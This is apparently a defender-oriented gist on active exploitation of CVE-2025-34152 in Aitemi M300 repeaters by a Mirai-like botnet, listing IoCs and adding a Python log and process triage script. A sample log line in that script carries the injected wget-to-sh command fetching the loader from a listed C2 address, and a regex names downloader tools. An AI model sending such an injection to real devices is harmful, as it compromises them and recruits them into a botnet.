@Chocapikk
Created September 12, 2025 21:10
Public evidence of CVE-2025-34152 being actively exploited in the wild. Includes log excerpts, malicious loader script, running process list, and malware sample (Mirai variant).

CVE-2025-34152 - Active Exploitation in the Wild

Date observed: September 2025
Affected devices: Shenzhen Aitemi M300 (MT02) Wi-Fi Repeaters

1. Exploit Trigger (Captured Logs)

Evidence from /tmp/commuos.log showing remote code execution via protocol.csp.
The attacker injects a wget | sh payload in the time parameter.

[Image: excerpt of /tmp/commuos.log showing the protocol.csp request with the injected time parameter]

2. Malicious Loader Script

The fetched script router.aitemi.sh downloads and executes multiple architecture-specific binaries (kitty.*), then deletes them.

[Image: aitemi_loader, contents of the router.aitemi.sh loader script]

3. Post-Infection Evidence

Process list on the compromised device shows multiple running instances of kitty.mips, confirming infection.

[Image: aitemi_process, process list from the compromised device showing kitty.mips instances]

4. Malware Sample

The binary retrieved from the device was uploaded to VirusTotal for analysis (30 / 63 detections).

[Image: aitemi_virustotal, VirusTotal detection results for the retrieved binary]
  • SHA256: 53b0848fd203ff8efaee5c44931ec250d8c1116c4935288de1fd7100753bbbe6
  • VirusTotal: View Analysis

Indicators of Compromise (IoCs)

Type           Value
C2 URLs        http://196.251.84.194/router.aitemi.sh, http://196.251.84.253/router.aitemi.sh
Dropped Files  kitty.arm, kitty.mips, kitty.mipsel, kitty.aarch64, kitty.x86, kitty.x86_64
SHA256         53b0848fd203ff8efaee5c44931ec250d8c1116c4935288de1fd7100753bbbe6

Conclusion

These artifacts confirm that CVE-2025-34152 is actively exploited in the wild by an IoT botnet variant (Mirai-like).
The exploit chain:

  1. RCE on vulnerable device via protocol.csp
  2. Download and execution of a multi-architecture loader
  3. Deployment of a bot binary joining the device to a botnet

⚠️ Note: Attacker infrastructure and malware IoCs are disclosed for defender use.
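
As an added example that is not part of the original gist, the following Python script sweeps constructed sample data (a few web-log lines, a ps listing and a byte string) for the indicators listed above: a protocol.csp request whose time parameter carries downloader or shell syntax instead of a timestamp, the two C2 URLs, the kitty.* process names and the published SHA256. The log and ps field layouts and the exact shape of the injected parameter are assumptions made for illustration; the repeater's real formats may differ.

```python
"""Offline triage for the CVE-2025-34152 activity described in the report.
Added example, not the gist author's code; sample data below is constructed."""
import hashlib
import re
from urllib.parse import parse_qs, urlparse

# IoCs exactly as listed in the report.
C2_URLS = {
    "http://196.251.84.194/router.aitemi.sh",
    "http://196.251.84.253/router.aitemi.sh",
}
DROPPED_FILES = {"kitty.arm", "kitty.mips", "kitty.mipsel",
                 "kitty.aarch64", "kitty.x86", "kitty.x86_64"}
BOT_SHA256 = "53b0848fd203ff8efaee5c44931ec250d8c1116c4935288de1fd7100753bbbe6"

# A time parameter should only carry a timestamp; downloader names and
# shell metacharacters in it indicate command injection.
INJECTION_RE = re.compile(r"wget|curl|tftp|busybox|\bsh\b|[;|`]|\$\(", re.I)
REQUEST_RE = re.compile(r"\b(?:GET|POST)\s+(\S+)")


def suspicious_requests(log_text):
    """Return (line_no, decoded time value, C2 URLs seen) for every request
    to protocol.csp whose time parameter looks like injected shell."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlparse(m.group(1))
        if not url.path.endswith("protocol.csp"):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("time", []):
            if INJECTION_RE.search(value):
                seen = sorted(u for u in C2_URLS if u in value)
                hits.append((n, value, seen))
    return hits


def infected_processes(ps_text):
    """Return (pid, command) for processes whose command line names one of
    the dropped bot binaries, matched on basename so any drop path counts.
    Assumes the BusyBox-style layout: PID USER VSZ STAT COMMAND."""
    found = []
    for line in ps_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 5:
            continue
        pid, args = fields[0], fields[4:]
        if any(tok.rsplit("/", 1)[-1] in DROPPED_FILES for tok in args):
            found.append((pid, " ".join(args)))
    return found


def is_known_sample(data):
    """True when the bytes hash to the SHA256 published for the bot binary."""
    return hashlib.sha256(data).hexdigest() == BOT_SHA256


def triage(log_text, ps_text):
    """Summarise the exploit-chain evidence: injection attempt plus running bot."""
    reqs = suspicious_requests(log_text)
    procs = infected_processes(ps_text)
    return {
        "injection_requests": len(reqs),
        "c2_urls": sorted({u for _, _, seen in reqs for u in seen}),
        "bot_processes": len(procs),
        "compromised": bool(reqs and procs),
    }


# Constructed sample data (assumed layouts, not captured from a device).
SAMPLE_LOG = """\
[2025-09-12 21:03:11] GET /protocol.csp?time=2025-09-12%2021:03:11 HTTP/1.1 200
[2025-09-12 21:04:27] GET /protocol.csp?time=wget%20http://196.251.84.194/router.aitemi.sh%20-O-%7Csh HTTP/1.1 200
[2025-09-12 21:04:30] GET /index.html HTTP/1.1 200
"""
SAMPLE_PS = """\
  PID USER       VSZ STAT COMMAND
    1 root      1384 S    init
  231 root      1120 S    /usr/sbin/httpd
  412 root      2216 S    /tmp/kitty.mips
  413 root      2216 S    /tmp/kitty.mips
  415 root      1380 S    sh -c /tmp/kitty.mips
"""

if __name__ == "__main__":
    for n, value, c2 in suspicious_requests(SAMPLE_LOG):
        print(f"log line {n}: injected time={value!r} c2={c2}")
    for pid, cmd in infected_processes(SAMPLE_PS):
        print(f"pid {pid}: {cmd}")
    print(triage(SAMPLE_LOG, SAMPLE_PS))
```

On a real device the log text would come from /tmp/commuos.log and the process listing from ps; is_known_sample can be run over any kitty.* file recovered before the loader deletes it. The injection regex deliberately keys on what a timestamp field should never contain rather than on one payload, so it still fires if the loader URL changes.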
